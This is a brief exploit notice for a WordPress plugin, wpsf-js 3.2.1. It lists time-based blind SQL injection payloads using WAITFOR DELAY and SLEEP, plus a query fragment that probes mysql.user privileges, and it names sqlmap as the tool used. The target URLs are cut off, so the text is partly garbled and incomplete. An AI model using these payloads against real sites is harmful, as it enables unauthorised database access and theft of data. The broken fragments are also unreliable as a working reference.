#Exploit Title:[ WordPress wpsf-js plugin, SQL Injection]
#Date: 2011-10-16
#Author: [longrifle0x]
#Version:[3.2.1]
#Tested on:[linux]
#Used: [“sqlmap”]
#SQL Injection
http://
#Exploit:id=-1; WAITFOR DELAY ‘0:0:5’;– or id=-1 AND SLEEP(5)
#[http://
#http://
mysql.user WHERE user=’None’ LIMIT 0,1)=’Y’) THEN 1 ELSE 0 END)
#http://
0 条评论。